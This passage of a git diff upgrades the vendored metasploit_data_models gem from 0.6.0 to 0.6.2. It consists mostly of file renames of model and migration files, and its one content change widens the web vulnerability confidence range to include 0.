lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/api_key.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/api_key.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/client.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/client.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/client.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/client.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/cred.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/cred.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/cred.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/event.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/event.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/event.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/exploit_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/exploit_attempt.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/exploit_attempt.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/exploit_attempt.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/exploited_host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/exploited_host.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/exploited_host.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/exploited_host.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/host.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/host.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/host_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/host_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host_tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/host_tag.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host_tag.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/host_tag.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/imported_cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/imported_cred.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/imported_cred.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/imported_cred.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/listener.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/listener.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/listener.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/listener.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/loot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/loot.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/loot.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/loot.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/macro.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/macro.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/macro.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/macro.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/mod_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/mod_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/mod_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/mod_ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_action.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_action.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_action.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_action.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_arch.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_arch.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_arch.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_arch.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_author.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_author.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_author.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_author.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_mixin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_mixin.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_mixin.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_mixin.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_platform.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_platform.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_platform.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_platform.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_target.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_target.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/module_target.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/nexpose_console.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/nexpose_console.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/nexpose_console.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/nexpose_console.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/note.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/note.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/note.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/note.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/profile.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/profile.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/profile.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/profile.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/report.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/report.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/report.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/report.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/report_template.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/report_template.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/report_template.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/report_template.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/route.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/route.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/route.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/route.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/service.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/service.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/service.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/service.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/session.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/session.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/session.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/session.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/session_event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/session_event.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/session_event.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/session_event.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/tag.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/tag.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/tag.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/task.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/task.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/task.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/task.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/user.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/user.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/user.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/vuln.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/vuln.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/vuln_attempt.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_attempt.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/vuln_attempt.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/vuln_detail.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_detail.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/vuln_detail.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/vuln_ref.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_ref.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/vuln_ref.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_form.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/web_form.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_form.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/web_form.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_page.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/web_page.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_page.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/web_page.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_site.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/web_site.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_site.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/web_site.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/web_vuln.rb similarity index 96% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_vuln.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/web_vuln.rb index 5d9df893c7..fa24eee885 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_vuln.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/web_vuln.rb @@ -15,9 +15,8 @@ class Mdm::WebVuln < ActiveRecord::Base # CONSTANTS # - # A percentage {#confidence} that the vulnerability is real and not a false positive. 0 is not allowed because there - # shouldn't be an {Mdm::WebVuln} record if there is 0% {#confidence} in the the finding. - CONFIDENCE_RANGE = 1 .. 100 + # A percentage {#confidence} that the vulnerability is real and not a false positive. + CONFIDENCE_RANGE = 0 .. 100 # Default value for {#params} DEFAULT_PARAMS = [] diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/wmap_request.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/wmap_request.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/wmap_request.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/wmap_request.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/wmap_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/wmap_target.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/wmap_target.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/wmap_target.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/workspace.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/workspace.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/workspace.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/app/models/mdm/workspace.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/bin/mdm_console b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/bin/mdm_console similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/bin/mdm_console rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/bin/mdm_console diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/console_db.yml b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/console_db.yml similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/console_db.yml rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/console_db.yml diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/000_create_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/000_create_tables.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/000_create_tables.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/000_create_tables.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/001_add_wmap_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/001_add_wmap_tables.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/001_add_wmap_tables.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/001_add_wmap_tables.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/002_add_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/002_add_workspaces.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/002_add_workspaces.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/002_add_workspaces.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/003_move_notes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/003_move_notes.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/003_move_notes.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/003_move_notes.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/004_add_events_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/004_add_events_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/004_add_events_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/004_add_events_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/005_expand_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/005_expand_info.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/005_expand_info.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/005_expand_info.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/006_add_timestamps.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/006_add_timestamps.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/006_add_timestamps.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/006_add_timestamps.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/007_add_loots.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/007_add_loots.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/007_add_loots.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/007_add_loots.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/008_create_users.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/008_create_users.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/008_create_users.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/008_create_users.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/009_add_loots_ctype.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/009_add_loots_ctype.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/009_add_loots_ctype.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/009_add_loots_ctype.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/010_add_alert_fields.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/010_add_alert_fields.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/010_add_alert_fields.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/010_add_alert_fields.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/011_add_reports.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/011_add_reports.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/011_add_reports.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/011_add_reports.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/012_add_tasks.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/012_add_tasks.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/012_add_tasks.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/012_add_tasks.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/013_add_tasks_result.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/013_add_tasks_result.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/013_add_tasks_result.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/013_add_tasks_result.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/014_add_loots_fields.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/014_add_loots_fields.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/014_add_loots_fields.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/014_add_loots_fields.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/015_rename_user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/015_rename_user.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/015_rename_user.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/015_rename_user.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/016_add_host_purpose.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/016_add_host_purpose.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/016_add_host_purpose.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/016_add_host_purpose.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/017_expand_info2.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/017_expand_info2.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/017_expand_info2.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/017_expand_info2.rb diff --git 